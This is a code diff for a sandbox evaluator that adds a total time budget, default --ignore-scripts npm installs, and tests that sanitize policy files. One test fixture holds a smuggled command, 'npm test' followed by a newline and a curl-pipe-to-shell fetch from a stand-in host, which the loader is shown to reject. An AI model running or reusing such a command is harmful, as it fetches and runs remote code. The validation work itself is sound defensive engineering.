--- a/src/evaluation/sandbox-evaluator.ts
+++ b/src/evaluation/sandbox-evaluator.ts
@@ -5,11 +5,16 @@ import { ExternalServiceError } from "../utils/errors";
 import type { Logger } from "../utils/logger";
 import type { Result } from "../utils/result";
 import { err, ok } from "../utils/result";
-import type { EvalPolicy, EvalResult, Evaluator } from "./types";
+import {
+  DEFAULT_COMMAND,
+  DEFAULT_INSTALL_TIMEOUT_MS,
+  DEFAULT_TIMEOUT_MS,
+  DEFAULT_TOTAL_BUDGET_MS,
+  MAX_TOTAL_BUDGET_MS,
+  MIN_TOTAL_BUDGET_MS,
+} from "./limits";
+import type { EvalPolicy, EvalResult, Evaluator, SandboxEvaluatorConfig } from "./types";
 
-const DEFAULT_COMMAND = "npm test";
-const DEFAULT_TIMEOUT_MS = 60_000;
-const DEFAULT_INSTALL_TIMEOUT_MS = 120_000;
 const MAX_OUTPUT_IN_REASON = 500;
 
 /**
@@ -74,6 +79,94 @@ function parseTestOutput(stdout: string, stderr: string): number | null {
   return null;
 }
 
+/**
+ * The phases a sandbox evaluation spends time in, in execution order. Named so
+ * a budget-exceeded reason says *where* the time went — an agent reading the
+ * verdict can tell "your install is too slow" from "your suite is too slow"
+ * without a human reading the output.
+ */
+export type SandboxPhase = "tree-read" | "create" | "materialize" | "install" | "command";
+
+/**
+ * Bring a policy-supplied duration into range, falling back to `fallback` for
+ * anything that is not a finite number.
+ *
+ * Duplicated in spirit by `policy-loader`, which clamps the same fields when a
+ * policy file is read. Both exist on purpose: the loader produces the operator
+ * warning, and this one is the boundary that actually holds, because
+ * `evaluate` is reachable from a policy cache and from callers that never
+ * loaded a file.
+ */
+function clampToRange(value: number, min: number, max: number, fallback: number): number {
+  if (!Number.isFinite(value)) return fallback;
+  return Math.min(max, Math.max(min, value));
+}
+
+/**
+ * Stable prefix for a budget-exceeded verdict. Exported because it is the
+ * contract callers and tests match on: the free-text remainder may change, this
+ * may not.
+ */
+export function budgetExceededReason(phase: SandboxPhase, totalBudgetMs: number): string {
+  return `sandbox budget exceeded (${phase}): evaluation did not finish within ${totalBudgetMs}ms`;
+}
+
+/**
+ * A wall-clock allowance shared across every phase of one evaluation.
+ *
+ * Exists because the per-phase timeouts are independent: with defaults, install
+ * and the scored command alone permit their sum, and nothing bounded the total.
+ * A caller or proxy gives up long before that, leaving the submitter with no
+ * verdict.
+ *
+ * What it does and does not bound is load-bearing, because Workers freeze
+ * `Date.now()` between I/O (see `src/utils/phase-timer.ts`): time spent
+ * *awaiting the sandbox* advances the clock and is bounded reliably — that is
+ * the overrun this exists for — while pure-CPU work inside the Worker (pack
+ * decompression, base64 encoding a large tree) may read as ~0ms and is
+ * constrained by workerd's CPU limit rather than by this.
+ */
+export interface Budget {
+  /** Milliseconds left before the budget is exhausted; never negative. */
+  remaining(): number;
+  /** The timeout a phase may actually use: `min(requested, remaining)`. */
+  allow(requestedMs: number): number;
+  /** True once nothing is left. */
+  expired(): boolean;
+  /** The total this budget started with, for reporting. */
+  readonly totalMs: number;
+}
+
+/**
+ * Smallest timeout ever handed to `sandbox.run`. Never 0: the Sandbox binding
+ * does not document how it reads `timeout: 0`, and "no timeout" is a plausible
+ * reading — the exact opposite of what an exhausted budget means.
+ */
+const MIN_GRANTED_TIMEOUT_MS = 1;
+
+/**
+ * `now` is injected so tests drive elapsed time with a fake clock instead of
+ * sleeping. Deliberately timer-free: an earlier design raced phases against a
+ * `setTimeout`, which a fake clock cannot drive and which leaks a live timer
+ * into the test event loop.
+ */
+export function startBudget(totalMs: number, now: () => number = Date.now): Budget {
+  // `Math.max(0, NaN)` is NaN, not 0 — so a non-finite total would produce a
+  // budget that never reports expired and hands `NaN` to `sandbox.run`, whose
+  // handling of it is undefined. This type is exported, so the guard belongs
+  // here rather than only at the call sites.
+  const total = Number.isFinite(totalMs) ? totalMs : DEFAULT_TOTAL_BUDGET_MS;
+  const startedAt = now();
+  const remaining = () => Math.max(0, total - (now() - startedAt));
+  return {
+    totalMs: total,
+    remaining,
+    expired: () => remaining() <= 0,
+    allow: (requestedMs: number) =>
+      Math.max(MIN_GRANTED_TIMEOUT_MS, Math.min(requestedMs, remaining())),
+  };
+}
+
 /** The lockfile names `npm ci` accepts. */
 const NPM_LOCKFILES = ["package-lock.json", "npm-shrinkwrap.json"] as const;
 
@@ -89,11 +182,24 @@ const NPM_LOCKFILES = ["package-lock.json", "npm-shrinkwrap.json"] as const;
  * their contents, so no text decode is needed here. `files` carries raw bytes
  * end to end like the rest of the read path; a manifest's actual contents
  * would be decoded at the point that genuinely needs text, not here.
+ *
+ * `--ignore-scripts` is the default because the tree is authored by an agent or
+ * by anyone who can push to the workspace, and `preinstall`/`install`/
+ * `postinstall` would otherwise execute before any human has reviewed the
+ * change. It narrows the window rather than closing it — a tree-supplied
+ * `.npmrc` still redirects the registry, lockfile `resolved` URLs are still
+ * fetched verbatim, and the scored command runs untrusted code by design (see
+ * `docs/adr/007-sandbox-evaluator-threat-model.md`). `opts` is optional so that
+ * omitting it yields the *safe* behaviour.
  */
-export function installCommandFor(files: ReadonlyMap<string, Uint8Array>): string | null {
+export function installCommandFor(
+  files: ReadonlyMap<string, Uint8Array>,
+  opts?: { allowInstallScripts?: boolean },
+): string | null {
   if (!files.has("package.json")) return null;
   const base = NPM_LOCKFILES.some((lockfile) => files.has(lockfile)) ? "npm ci" : "npm install";
-  return `${base} --no-audit --no-fund`;
+  const flags = opts?.allowInstallScripts === true ? "" : " --ignore-scripts";
+  return `${base} --no-audit --no-fund${flags}`;
 }
 
 /**
@@ -251,7 +357,25 @@ export interface MaterializedTree {
 export async function materializeTree(
   sandbox: SandboxInstance,
   files: ReadonlyMap<string, Uint8Array>,
-  opts: { decodeTimeoutMs: number; logger?: Logger },
+  opts: {
+    decodeTimeoutMs: number;
+    /**
+     * Supplies the decode step's timeout, called *after* the writes — which are
+     * unbounded and can consume most of a caller's remaining budget. A grant
+     * computed before this function runs would be spent against a stale
+     * remaining, letting the decode overrun the total budget on a large tree.
+     *
+     * Taking the caller's grant function rather than a `Budget` also lets the
+     * caller record that this grant was budget-shortened, so a decode that then
+     * times out is classified the same way as any other budgeted phase. Callers
+     * with no budget (the post-merge check) omit it and get `decodeTimeoutMs`
+     * unchanged.
+     */
+    grant?: (requestedMs: number) => number;
+    /** Clock for the decode timing, injectable to match the caller's budget. */
+    now?: () => number;
+    logger?: Logger;
+  },
 ): Promise<MaterializedTree> {
   // The full tree can hold thousands of files; one round trip per file
   // dominates latency, so write in bounded concurrent batches.
@@ -288,11 +412,12 @@ export async function materializeTree(
   const scriptPath = freeStagingPath(BINARY_DECODE_SCRIPT_PATH, taken);
   await sandbox.writeFile(manifestPath, binaryPaths.join("\n"));
   await sandbox.writeFile(scriptPath, decodeBinaryFilesScript(manifestPath));
-  const decodeStartedAt = Date.now();
+  const now = opts.now ?? Date.now;
+  const decodeStartedAt = now();
   const decodeResult = await sandbox.run(binaryDecodeCommandFor(scriptPath), {
-    timeout: opts.decodeTimeoutMs,
+    timeout: opts.grant ? opts.grant(opts.decodeTimeoutMs) : opts.decodeTimeoutMs,
   });
-  const decodeMs = Date.now() - decodeStartedAt;
+  const decodeMs = now() - decodeStartedAt;
   if (decodeResult.exitCode !== 0) {
     const output = (decodeResult.stdout + decodeResult.stderr)
       .slice(0, MAX_OUTPUT_IN_REASON)
@@ -311,11 +436,16 @@ export class SandboxEvaluator implements Evaluator {
    * survive the write boundary) lives in what comes back from that read, and
    * the alternative — standing up a real remote per case — would make those
    * paths expensive enough to go untested.
+   *
+   * `now` is injectable for the same reason: the total budget's behaviour is
+   * entirely a function of elapsed time, and driving it with a fake clock is
+   * the only way to test exhaustion without sleeping for minutes.
    */
   constructor(
     private sandbox: SandboxBinding,
     private repo: SandboxRepoAccess,
     private readFiles: RepoFilesReader = readRepoFiles,
+    private now: () => number = Date.now,
   ) {}
 
   /**
@@ -329,15 +459,24 @@ export class SandboxEvaluator implements Evaluator {
    * land. The parameter stays because it is part of the `Evaluator` contract
    * shared with the diff-based evaluators.
    *
-   * Two kinds of failure, deliberately distinguished:
+   * Three kinds of failure, deliberately distinguished:
    *
    * - The suite ran and did not pass, or a dependency install failed: score 0
    *   with `passed: false`. An evaluation that could not run must never read
    *   as one that passed, so these are verdicts, not errors.
+   * - The total budget ran out: also a verdict (score 0), with a reason naming
+   *   the phase. The sandbox was reachable and simply did not finish in the
+   *   time allowed, which is a judgement about the change — its install or its
+   *   suite is too slow for a synchronous request — not an infrastructure
+   *   failure. Reached two ways: a phase that cannot be started, and a phase
+   *   the budget had to shorten which then failed at that shortened timeout.
+   *   A phase that hits the project's *own* configured timeout is not this —
+   *   it keeps returning `err`, as it always has.
    * - The evaluated tree could not be reached or read, or the sandbox itself
-   *   threw: `err(ExternalServiceError)`. There is no verdict to give here —
-   *   the caller decides whether to retry or surface the failure, and scoring
-   *   0 would fabricate a judgement about code we never saw.
+   *   threw for any other reason: `err(ExternalServiceError)`. There is no
+   *   verdict to give here — the caller decides whether to retry or surface the
+   *   failure, and scoring 0 would fabricate a judgement about code we never
+   *   saw.
    *
    * A missing SANDBOX binding or missing repo access never reaches this method
    * at all: `buildEvaluators` substitutes an `UnavailableEvaluator` at
@@ -350,9 +489,7 @@ export class SandboxEvaluator implements Evaluator {
   ): Promise<Result<EvalResult, AppError>> {
     logger.debug("Starting sandbox evaluation");
 
-    const config = policy.evaluators.find((e) => e.type === "sandbox") as
-      | { type: "sandbox"; command?: string; timeoutMs?: number; installTimeoutMs?: number }
-      | undefined;
+    const config = policy.evaluators.find((e): e is SandboxEvaluatorConfig => e.type === "sandbox");
 
     if (!config) {
       logger.info("No sandbox evaluator configured");
@@ -362,11 +499,77 @@ export class SandboxEvaluator implements Evaluator {
     const command = config.command ?? DEFAULT_COMMAND;
     const timeoutMs = config.timeoutMs ?? DEFAULT_TIMEOUT_MS;
     const installTimeoutMs = config.installTimeoutMs ?? DEFAULT_INSTALL_TIMEOUT_MS;
+    // Clamped here, not only at load time: `evaluate` is reachable from a KV
+    // policy cache and from callers that never went through `policy-loader`, and
+    // a `totalBudgetMs` of 0 would make every change on the project fail before
+    // a sandbox was ever created.
+    const totalBudgetMs = clampToRange(
+      config.totalBudgetMs ?? DEFAULT_TOTAL_BUDGET_MS,
+      MIN_TOTAL_BUDGET_MS,
+      MAX_TOTAL_BUDGET_MS,
+      DEFAULT_TOTAL_BUDGET_MS,
+    );
     const minScore = policy.minScore ?? 0.7;
 
-    logger.debug("Sandbox config", { command, timeoutMs, installTimeoutMs });
+    logger.debug("Sandbox config", { command, timeoutMs, installTimeoutMs, totalBudgetMs });
+
+    // Started before the tree read so a slow clone is charged against what the
+    // later phases get, even though the read itself is not interruptible.
+    const budget = startBudget(totalBudgetMs, this.now);
 
     let sb: Awaited<ReturnType<SandboxBinding["create"]>> | null = null;
+    let sandboxMs = 0;
+    // Tracked so a throw from a phase whose granted timeout fired can be
+    // reported against the phase that actually ran out, not a guess.
+    let currentPhase: SandboxPhase = "tree-read";
+    // When the current phase started, so a phase that throws still contributes
+    // the time it burned to `sandbox_ms` instead of losing it.
+    let phaseStartedAt: number | null = null;
+    /**
+     * Whether the budget — rather than the project's own configured timeout —
+     * is what shortened the current phase's grant. This is what separates
+     * "the total budget ran out" (a verdict) from "your configured phase
+     * timeout fired" (an error, as it has always been): without it, every
+     * ordinary phase timeout would be relabelled as budget exhaustion.
+     */
+    let grantWasBudgetCapped = false;
+
+    /** The grant handed to the phase now running, for the timeout check below. */
+    let currentGrantMs = 0;
+
+    /** Grant a phase its timeout, recording whether the budget capped it. */
+    const grantFor = (requestedMs: number): number => {
+      const granted = budget.allow(requestedMs);
+      grantWasBudgetCapped = granted < requestedMs;
+      currentGrantMs = granted;
+      return granted;
+    };
+
+    /**
+     * Did the phase that just threw actually burn its whole grant?
+     *
+     * Distinguishes a timeout from a transient failure without matching on
+     * error message text, which is binding-specific and would silently rot. A
+     * Sandbox API blip 200ms into a 5s grant is infrastructure; a throw at the
+     * 5s mark is the timeout firing.
+     */
+    const phaseConsumedItsGrant = (): boolean =>
+      phaseStartedAt !== null && this.now() - phaseStartedAt >= currentGrantMs;
+
+    /**
+     * The budget ran out. Reported as a verdict rather than an error — see the
+     * method doc. `costs` is omitted before the sandbox exists: there is no
+     * sandbox time to report, and clone time is `git_ops`, not `sandbox_ms`.
+     */
+    const budgetVerdict = (phase: SandboxPhase): Result<EvalResult, AppError> => {
+      logger.info("Sandbox evaluation exceeded its total budget", { phase, totalBudgetMs });
+      return ok({
+        score: 0,
+        passed: false,
+        reason: budgetExceededReason(phase, totalBudgetMs),
+        ...(sb === null ? {} : { costs: [{ kind: "sandbox_ms" as const, quantity: sandboxMs }] }),
+      });
+    };
 
     try {
       // Materialize the full workspace tree at the evaluated commit — the same
@@ -389,27 +592,53 @@ export class SandboxEvaluator implements Evaluator {
       }
       const files = filesResult.data;
 
+      // The read is not interruptible (`RepoFilesReader` takes no timeout), so
+      // the budget cannot cut it short — it can only decline to go further.
+      if (budget.expired()) return budgetVerdict("tree-read");
+
+      currentPhase = "create";
       sb = await this.sandbox.create();
       const instance = sb;
       logger.debug("Sandbox created");
 
-      let sandboxMs = 0;
+      currentPhase = "materialize";
+      if (budget.expired()) return budgetVerdict("materialize");
 
       // Materializing the tree — string-only writeFile, base64 for binaries,
       // in-sandbox decode — is shared with the post-merge check so the write
       // boundary has exactly one implementation. `installTimeoutMs` bounds the
-      // decode step because it is setup, not the scored command.
+      // decode step because it is setup, not the scored command; the batched
+      // `writeFile` loop takes no timeout and so is charged but not bounded.
+      //
+      // The budget is passed in rather than a precomputed timeout because those
+      // unbounded writes happen first: a grant calculated out here would be
+      // spent against whatever remained *before* the tree was written, letting
+      // the decode overrun the total budget on a large tree.
+      // Timed from here rather than from the decode alone: if the writes or the
+      // decode throw, the `catch` charges everything this phase burned, and the
+      // decode's own grant flows through `grantFor` so a budget-shortened
+      // decode that times out is classified like any other phase.
+      phaseStartedAt = this.now();
       const materialized = await materializeTree(instance, files, {
         decodeTimeoutMs: installTimeoutMs,
+        grant: grantFor,
+        now: this.now,
         logger,
       });
+      phaseStartedAt = null;
       sandboxMs += materialized.decodeMs;
 
-      const installCommand = installCommandFor(files);
+      const installCommand = installCommandFor(files, {
+        allowInstallScripts: config.allowInstallScripts,
+      });
       if (installCommand !== null) {
-        const installStartedAt = Date.now();
-        const install = await sb.run(installCommand, { timeout: installTimeoutMs });
-        sandboxMs += Date.now() - installStartedAt;
+        currentPhase = "install";
+        if (budget.expired()) return budgetVerdict("install");
+        const installStartedAt = this.now();
+        phaseStartedAt = installStartedAt;
+        const install = await sb.run(installCommand, { timeout: grantFor(installTimeoutMs) });
+        phaseStartedAt = null;
+        sandboxMs += this.now() - installStartedAt;
         logger.debug("Sandbox install completed", {
           installCommand,
           exitCode: install.exitCode,
@@ -426,9 +655,13 @@ export class SandboxEvaluator implements Evaluator {
         }
       }
 
-      const runStartedAt = Date.now();
-      const result = await sb.run(command, { timeout: timeoutMs });
-      sandboxMs += Date.now() - runStartedAt;
+      currentPhase = "command";
+      if (budget.expired()) return budgetVerdict("command");
+      const runStartedAt = this.now();
+      phaseStartedAt = runStartedAt;
+      const result = await sb.run(command, { timeout: grantFor(timeoutMs) });
+      phaseStartedAt = null;
+      sandboxMs += this.now() - runStartedAt;
       logger.debug("Sandbox command completed", { exitCode: result.exitCode, sandboxMs });
 
       let score: number;
@@ -445,6 +678,28 @@ export class SandboxEvaluator implements Evaluator {
       logger.info("Sandbox evaluation complete", { score, passed });
       return ok({ score, passed, reason, costs: [{ kind: "sandbox_ms", quantity: sandboxMs }] });
     } catch (error) {
+      // A phase whose granted timeout fired throws rather than returning, so
+      // budget exhaustion can arrive here as well as at a phase gate.
+      const timedOut = phaseConsumedItsGrant();
+      // Charge the time the throwing phase burned before classifying, so it is
+      // not lost from the cost record.
+      if (phaseStartedAt !== null) sandboxMs += this.now() - phaseStartedAt;
+
+      // Both conditions matter. `grantWasBudgetCapped` says the budget — not
+      // the project's own configured timeout — is what shortened this phase;
+      // without it, an ordinary configured timeout would be relabelled, quietly
+      // changing what every pre-existing sandbox timeout reports.
+      // `timedOut` says the phase actually spent its whole grant; without it, a
+      // transient Sandbox API failure part-way through a shortened phase would
+      // be reported as a definitive judgement about the change rather than the
+      // retryable infrastructure error it is.
+      //
+      // Note `expired()` is deliberately not the test: a capped grant is
+      // exactly `remaining`, so a phase that exhausts it lands within a
+      // millisecond of zero, and keying on which side of that boundary the
+      // clock happens to read would make the outcome nondeterministic.
+      if (grantWasBudgetCapped && timedOut) return budgetVerdict(currentPhase);
+
       const message = error instanceof Error ? error.message : String(error);
       logger.error(
         "Sandbox evaluation failed",
@@ -459,8 +714,20 @@ export class SandboxEvaluator implements Evaluator {
       );
     } finally {
       if (sb !== null) {
-        await sb.destroy();
-        logger.debug("Sandbox destroyed");
+        // Contained deliberately: an `await` that rejects inside `finally`
+        // replaces the returned Result with a rejection, which would reject the
+        // `Promise.all` in `runEvaluation` and discard every other evaluator's
+        // result. A sandbox we could not tear down is an operational problem to
+        // log, not a reason to lose the verdict.
+        try {
+          await sb.destroy();
+          logger.debug("Sandbox destroyed");
+        } catch (destroyError) {
+          logger.error(
+            "Failed to destroy sandbox; instance may leak",
+            destroyError instanceof Error ? destroyError : new Error(String(destroyError)),
+          );
+        }
       }
     }
   }

--- a/src/evaluation/types.ts
+++ b/src/evaluation/types.ts
@@ -71,6 +71,34 @@ export interface MergePolicy {
   autoRevert?: boolean;
 }
 
+/**
+ * The `sandbox` evaluator's slice of `.stratum/policy.yaml`.
+ *
+ * Named rather than inlined into `EvaluatorConfig` because the evaluator needs
+ * to refer to exactly this shape when it narrows its own config out of the
+ * policy; an inline re-declaration there would silently drift from this one.
+ */
+export interface SandboxEvaluatorConfig {
+  type: "sandbox";
+  /** Scored command. Default `npm test`. */
+  command?: string;
+  /** Timeout for the scored command. */
+  timeoutMs?: number;
+  /** Timeout for dependency install and the in-sandbox binary decode step. */
+  installTimeoutMs?: number;
+  /**
+   * Total wall clock the whole evaluation may spend before failing closed.
+   * Bounds the sum of the phases, which the per-phase timeouts do not.
+   */
+  totalBudgetMs?: number;
+  /**
+   * Run npm lifecycle scripts (`preinstall`/`install`/`postinstall`) during
+   * dependency install. Default false — the evaluated tree is untrusted, so
+   * installs pass `--ignore-scripts` unless a project owner opts in.
+   */
+  allowInstallScripts?: boolean;
+}
+
 export type EvaluatorConfig =
   | {
       type: "diff";
@@ -80,5 +108,5 @@ export type EvaluatorConfig =
       requiredPatterns?: string[];
     }
   | { type: "webhook"; url: string; secret?: string; timeoutMs?: number }
-  | { type: "sandbox"; command?: string; timeoutMs?: number; installTimeoutMs?: number }
+  | SandboxEvaluatorConfig
   | { type: "llm"; model?: string; threshold?: number; maxDiffChars?: number };

--- a/tests/evaluation.test.ts
+++ b/tests/evaluation.test.ts
@@ -1,6 +1,13 @@
 import { beforeEach, describe, expect, it, vi } from "vitest";
 import { CompositeEvaluator } from "../src/evaluation/composite-evaluator";
 import { DiffEvaluator } from "../src/evaluation/diff-evaluator";
+import {
+  MAX_COMMAND_LENGTH,
+  MAX_PHASE_TIMEOUT_MS,
+  MAX_TOTAL_BUDGET_MS,
+  MIN_PHASE_TIMEOUT_MS,
+  MIN_TOTAL_BUDGET_MS,
+} from "../src/evaluation/limits";
 import { loadPolicy } from "../src/evaluation/policy-loader";
 import type { EvalPolicy, Evaluator } from "../src/evaluation/types";
 import { WebhookEvaluator } from "../src/evaluation/webhook-evaluator";
@@ -828,5 +835,297 @@ describe("loadPolicy", () => {
     expect(policy.minScore).toBe(0.4);
     expect(policy.evaluators[0]).toMatchObject({ type: "diff", maxLines: 42 });
     expect(mockReadFileFromRepo).toHaveBeenCalledTimes(1);
+  });
+});
+
+describe("loadPolicy — evaluator sanitization", () => {
+  beforeEach(() => {
+    mockReadFileFromRepo.mockReset();
+  });
+
+  /** Loads `config` as the YAML policy file. */
+  async function loadConfig(config: unknown): Promise<EvalPolicy> {
+    mockReadFileFromRepo.mockResolvedValue({ success: true, data: JSON.stringify(config) });
+    return loadPolicy("https://repo.example.com", "tok", mockLogger);
+  }
+
+  function sandboxEntry(policy: EvalPolicy) {
+    return policy.evaluators.find((e) => e.type === "sandbox") as
+      | Record<string, unknown>
+      | undefined;
+  }
+
+  it("clamps an oversized sandbox timeout down to the phase ceiling", async () => {
+    const policy = await loadConfig({
+      evaluators: [{ type: "sandbox", timeoutMs: 999_999_999, installTimeoutMs: 999_999_999 }],
+    });
+
+    expect(sandboxEntry(policy)?.timeoutMs).toBe(MAX_PHASE_TIMEOUT_MS);
+    expect(sandboxEntry(policy)?.installTimeoutMs).toBe(MAX_PHASE_TIMEOUT_MS);
+  });
+
+  it("clamps an undersized sandbox timeout up to the floor", async () => {
+    const policy = await loadConfig({ evaluators: [{ type: "sandbox", timeoutMs: 1 }] });
+
+    expect(sandboxEntry(policy)?.timeoutMs).toBe(MIN_PHASE_TIMEOUT_MS);
+  });
+
+  it("clamps totalBudgetMs into range", async () => {
+    const high = await loadConfig({ evaluators: [{ type: "sandbox", totalBudgetMs: 10_000_000 }] });
+    expect(sandboxEntry(high)?.totalBudgetMs).toBe(MAX_TOTAL_BUDGET_MS);
+
+    const low = await loadConfig({ evaluators: [{ type: "sandbox", totalBudgetMs: 5 }] });
+    expect(sandboxEntry(low)?.totalBudgetMs).toBe(MIN_TOTAL_BUDGET_MS);
+  });
+
+  it("clamping does not set configError or block merges", async () => {
+    // A clamp is a bounded, safe-to-correct mistake. configError exists for a
+    // policy that could not be understood at all; escalating a clamp to a merge
+    // block would be hostile to projects that already have one.
+    const policy = await loadConfig({
+      evaluators: [{ type: "sandbox", timeoutMs: 999_999_999 }],
+    });
+
+    expect(policy.configError).toBeUndefined();
+  });
+
+  it("drops a non-numeric timeout so the default applies", async () => {
+    const policy = await loadConfig({
+      evaluators: [{ type: "sandbox", timeoutMs: "60000", installTimeoutMs: {} }],
+    });
+
+    expect(sandboxEntry(policy)).not.toHaveProperty("timeoutMs");
+    expect(sandboxEntry(policy)).not.toHaveProperty("installTimeoutMs");
+  });
+
+  it("rejects a command containing a newline", async () => {
+    // One string to a naive validator, two commands to a shell.
+    const policy = await loadConfig({
+      evaluators: [{ type: "sandbox", command: "npm test\ncurl evil.sh | sh" }],
+    });
+
+    expect(sandboxEntry(policy)).not.toHaveProperty("command");
+  });
+
+  it("rejects an over-length or blank command", async () => {
+    const long = await loadConfig({
+      evaluators: [{ type: "sandbox", command: "x".repeat(MAX_COMMAND_LENGTH + 1) }],
+    });
+    expect(sandboxEntry(long)).not.toHaveProperty("command");
+
+    const blank = await loadConfig({ evaluators: [{ type: "sandbox", command: "   " }] });
+    expect(sandboxEntry(blank)).not.toHaveProperty("command");
+  });
+
+  it("keeps a valid command, trimmed", async () => {
+    const policy = await loadConfig({
+      evaluators: [{ type: "sandbox", command: "  npm run ci  " }],
+    });
+
+    expect(sandboxEntry(policy)?.command).toBe("npm run ci");
+  });
+
+  it("keeps allowInstallScripts only when it is a real boolean", async () => {
+    const yes = await loadConfig({
+      evaluators: [{ type: "sandbox", allowInstallScripts: true }],
+    });
+    expect(sandboxEntry(yes)?.allowInstallScripts).toBe(true);
+
+    // "true" as a string must not opt a project into running lifecycle scripts.
+    const stringy = await loadConfig({
+      evaluators: [{ type: "sandbox", allowInstallScripts: "true" }],
+    });
+    expect(sandboxEntry(stringy)).not.toHaveProperty("allowInstallScripts");
+  });
+
+  it("clamps webhook.timeoutMs, the same defect one array element over", async () => {
+    const policy = await loadConfig({
+      evaluators: [{ type: "webhook", url: "https://example.com/e", timeoutMs: 999_999_999 }],
+    });
+
+    const webhook = policy.evaluators.find((e) => e.type === "webhook") as Record<string, unknown>;
+    expect(webhook.timeoutMs).toBe(MAX_PHASE_TIMEOUT_MS);
+    expect(webhook.url).toBe("https://example.com/e");
+  });
+
+  it("clamps minScore into [0, 1] so the gate cannot be disabled by a number", async () => {
+    const low = await loadConfig({ evaluators: [{ type: "diff" }], minScore: -5 });
+    expect(low.minScore).toBe(0);
+
+    const high = await loadConfig({ evaluators: [{ type: "diff" }], minScore: 42 });
+    expect(high.minScore).toBe(1);
+  });
+
+  it("does not crash buildEvaluators on entries that are not objects", async () => {
+    // The array guard only checks Array.isArray, so these used to reach the
+    // evaluator builders and throw on `.type` access. They are now rejected,
+    // and because entries were dropped the gate fails closed.
+    const policy = await loadConfig({
+      evaluators: [null, "sandbox", {}, 42, [], { type: "diff", maxLines: 10 }],
+    });
+
+    expect(policy.configError).toBeDefined();
+    // Evaluation still runs on the defaults so the change flow is not broken.
+    expect(policy.evaluators).toEqual([{ type: "diff" }]);
+  });
+
+  it("fails closed when one entry is dropped but its siblings survive", async () => {
+    // The fail-open shape this guards: a typo'd webhook url used to reach
+    // WebhookEvaluator and block the merge. Dropping the entry while `diff`
+    // survives would silently remove that gate and let the change through on
+    // the remaining one.
+    const policy = await loadConfig({
+      evaluators: [{ type: "webhook" }, { type: "diff" }],
+    });
+
+    expect(policy.configError).toBeDefined();
+    expect(policy.configError).toMatch(/unusable/i);
+  });
+
+  it("does not fail closed for an unrecognized evaluator type", async () => {
+    // A policy naming a future or misspelled evaluator type is copied through
+    // and rejected downstream by buildEvaluators, so it must not trip the
+    // dropped-entry check.
+    const policy = await loadConfig({
+      evaluators: [{ type: "future_evaluator" }, { type: "diff" }],
+    });
+
+    expect(policy.configError).toBeUndefined();
+    expect(policy.evaluators).toHaveLength(2);
+  });
+
+  it("preserves evaluator types it does not clamp", async () => {
+    const policy = await loadConfig({
+      evaluators: [{ type: "llm", model: "m", threshold: 0.5 }],
+    });
+
+    expect(policy.evaluators[0]).toMatchObject({ type: "llm", model: "m", threshold: 0.5 });
+  });
+
+  it("never mutates the module-level default policy", async () => {
+    // The loader shallow-spreads DEFAULT_POLICY, so a sanitizer that clamped in
+    // place would poison the default for the isolate's lifetime — across
+    // requests and across tenants.
+    await loadConfig({ evaluators: [{ type: "sandbox", timeoutMs: 999_999_999 }] });
+
+    mockReadFileFromRepo.mockResolvedValue({
+      success: false,
+      error: new AppError("missing", "NOT_FOUND", 404),
+    });
+    const fallback = await loadPolicy("https://repo.example.com", "tok", mockLogger);
+
+    expect(fallback.evaluators).toEqual([{ type: "diff" }]);
+  });
+
+  /** Loads a literal YAML document, for values JSON cannot express. */
+  async function loadYaml(yaml: string): Promise<EvalPolicy> {
+    mockReadFileFromRepo.mockResolvedValue({ success: true, data: yaml });
+    return loadPolicy("https://repo.example.com", "tok", mockLogger);
+  }
+
+  it("replaces a minScore it rejected instead of leaving the raw value in place", async () => {
+    // The spread puts the raw value in `policy.minScore` before validation, so
+    // a rejection that only skips the assignment leaves the bad value behind.
+    // `-Infinity` makes `score >= minScore` true for every score — including a
+    // sandbox verdict of 0 — which disables the gate entirely.
+    const negInfinity = await loadYaml(
+      ["evaluators:", "  - type: diff", "minScore: -.inf"].join("\n"),
+    );
+    expect(negInfinity.minScore).toBe(0.7);
+
+    const nan = await loadYaml(["evaluators:", "  - type: diff", "minScore: .nan"].join("\n"));
+    expect(nan.minScore).toBe(0.7);
+
+    // A string compares by coercion: `0.1 >= "-5"` is true.
+    const stringy = await loadConfig({ evaluators: [{ type: "diff" }], minScore: "-5" });
+    expect(stringy.minScore).toBe(0.7);
+  });
+
+  it("fails closed, not open, when a YAML alias cycle appears in a policy", async () => {
+    // A circular structure throws inside JSON.stringify, which is reached while
+    // *logging* a rejected entry. That throw used to escape to the outer
+    // handler, which treats a file as absent — so a policy declaring two
+    // required approvals silently became the permissive default with **no**
+    // configError, dropping the approval requirement and re-enabling
+    // force-merge. Logging must never decide whether a policy loads.
+    //
+    // The file is still malformed (the self-referencing entry is unusable), so
+    // the outcome is a blocked merge rather than a loaded policy — which is the
+    // safe direction, and the opposite of what it used to do.
+    const policy = await loadYaml(
+      [
+        "merge:",
+        "  requiredApprovals: 2",
+        "  allowForce: false",
+        "evaluators: &e",
+        "  - type: sandbox",
+        "  - *e",
+      ].join("\n"),
+    );
+
+    expect(policy.configError).toBeDefined();
+  });
+
+  it("fails closed when a policy names evaluators but none survive sanitization", async () => {
+    // Falling through with an empty array would leave only the always-on secret
+    // scan, which passes a clean diff — so a policy the author meant as a gate
+    // would accept the change.
+    const policy = await loadConfig({ evaluators: [null, "sandbox", 42] });
+
+    expect(policy.configError).toBeDefined();
+  });
+
+  it("drops a webhook entry with no url", async () => {
+    const policy = await loadConfig({ evaluators: [{ type: "webhook" }] });
+
+    // Dropped, and therefore failing closed rather than loading a gate-less
+    // policy.
+    expect(policy.configError).toBeDefined();
+  });
+
+  it("does not fail closed for a genuinely empty evaluators array", async () => {
+    // Distinct from the case above: the author declared no evaluators, which
+    // already behaved this way and is not a misunderstanding of the file.
+    const policy = await loadConfig({ evaluators: [] });
+
+    expect(policy.configError).toBeUndefined();
+  });
+
+  it("keeps a webhook's url and secret while clamping its timeout", async () => {
+    const policy = await loadConfig({
+      evaluators: [
+        { type: "webhook", url: "https://e.example/x", secret: "s", timeoutMs: 999_999_999 },
+      ],
+    });
+
+    expect(policy.evaluators[0]).toEqual({
+      type: "webhook",
+      url: "https://e.example/x",
+      secret: "s",
+      timeoutMs: MAX_PHASE_TIMEOUT_MS,
+    });
+  });
+
+  it("warns about an unrecognized sandbox field instead of dropping it silently", async () => {
+    // `timeout` for `timeoutMs` is the typo most likely to be made and least
+    // likely to be noticed, since the whitelist rebuild discards it.
+    const warn = vi.mocked(mockLogger.warn);
+    warn.mockClear();
+
+    await loadConfig({ evaluators: [{ type: "sandbox", timeout: 60_000 }] });
+
+    expect(warn).toHaveBeenCalledWith(
+      "Ignoring unrecognized sandbox evaluator field",
